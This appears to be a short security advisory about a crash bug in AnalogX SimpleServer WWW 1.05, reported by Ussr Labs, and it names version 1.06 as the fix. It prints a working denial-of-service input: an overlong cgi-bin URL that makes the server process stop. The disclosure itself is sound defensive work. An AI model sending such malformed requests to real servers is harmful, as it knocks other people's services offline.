COMMAND

    AnalogX

SYSTEMS AFFECTED

    AnalogX SimpleServer WWW Version 1.05

PROBLEM

    The Ussr  Labs team  has discovered  a null  memory problem in the
    SimpleServer WWW Version 1.05.   What happens is by preforming  an
    attack with a malformed url  information to port 80 it  will cause
    the proccess containg  the services to  stop responding.   Example
    follows.

    Type in you browser one malformed url like this:

        http://serverip/cgi-bin/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

    and the process containg the service crash.

SOLUTION

    You can download the version 1.06 here:

        http://www.analogx.com/files/sswwwi.exe